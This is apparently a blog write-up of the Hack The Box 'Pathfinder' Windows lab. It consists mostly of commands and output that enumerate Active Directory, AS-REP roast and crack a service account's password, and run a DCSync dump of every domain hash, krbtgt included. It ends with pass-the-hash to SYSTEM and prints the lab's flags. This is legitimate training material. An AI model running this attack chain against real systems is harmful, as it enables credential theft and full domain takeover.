Pathfinder

Hack The Box Starting Point Windows No Comments
$ nmap -p- -T4 -A 10.10.10.30
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-01 06:36:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49718/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

BloodHound
https://github.com/fox-it/BloodHound.py
$ pip install bloodhound
$ ~/.local/bin/bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30
INFO: Found AD domain: megacorp.local
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 5 users
INFO: Connecting to GC LDAP server: pathfinder.megacorp.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Pathfinder.MEGACORP.LOCAL
INFO: Done in 00M 17S

apt install neo4j
apt install bloodhound

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ sudo neo4j console

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ bloodhound --no-sandbox

Shortest Paths to High value Targets and Find Principles with DCSync Rights .
svc_bes has GetChangesAll privileges to the domain.

ASREPRoasting https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
kali@kali:~/0.htb/Starting_Point/Pathfinder30$ /usr/local/bin/GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:505dbb28aca9bd62df1c66792f6495b1$72efea37fa8a8aba1260c1804c1d2d1a35ef0a40507853e5de0b563fe9033f3b7e1d3c1b0b7b619c7d3c0691ba6daccbb5ee70c40495214c7dffb6f39a10fd027aad5e54cb38782e110784191a948845ef6bb9a1380baa8dc0ffbde2ce406b15406fda11dc4403abe8aefd787c58272408b836140ca8babef0bedd06cb8bb74e8e6bb77b3a4c51ec33746c105e622bc0fa71adab0e980b5834d679558f2144df7211a27daab7b5a271c96b66aa5f116af94d2104911a6a63ba53bc433ea020c57bfdb26d733890be4e0060ef21c69fb1edcdc888daf367c781dcc31945f4cfd107129a53aa63921a6f6464424ff62a58
kali@kali:~/0.htb/Starting_Point/Pathfinder30$ 

Get TGT ticket for the svc_bes and save it to hash.txt

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:10 DONE (2021-05-04 14:11) 0.09823g/s 1041Kp/s 1041Kc/s 1041KC/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ gem install evil-winrm
$ evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19
kali@kali:~/0.htb/Starting_Point/Pathfinder30$ evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes\Documents> dir
*Evil-WinRM* PS C:\Users\svc_bes\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> dir


    Directory: C:\Users\svc_bes\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/25/2020   2:35 PM             32 user.txt


*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05fb166688a8603d970c6d033f637f1
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> 

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ /usr/local/bin/secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:d74efe6aed160c594374f66c68dc0e98:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:489a219f9303e4a735935f003789947e9efd70a5f671738c5232738461a22a44
PATHFINDER$:aes128-cts-hmac-sha1-96:96a292de9bf471e1b5950adaa7381254
PATHFINDER$:des-cbc-md5:8a389e0b4ac8a404
[*] Cleaning up... 

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ psexec.py megacorp.local/administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.30.....
[*] Found writable share ADMIN$
[*] Uploading file fzShXuaQ.exe
[*] Opening SVCManager on 10.10.10.30.....
[*] Creating service OPLG on 10.10.10.30.....
[*] Starting service OPLG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BEDE-E51D

 Directory of C:\Users\Administrator\Desktop

02/25/2020  03:33 PM    <DIR>          .
02/25/2020  03:33 PM    <DIR>          ..
02/25/2020  03:33 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  13,213,958,144 bytes free

C:\Users\Administrator\Desktop>type root.txt
ee613b2d048303e5fd4ac6647d944645
C:\Users\Administrator\Desktop>

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation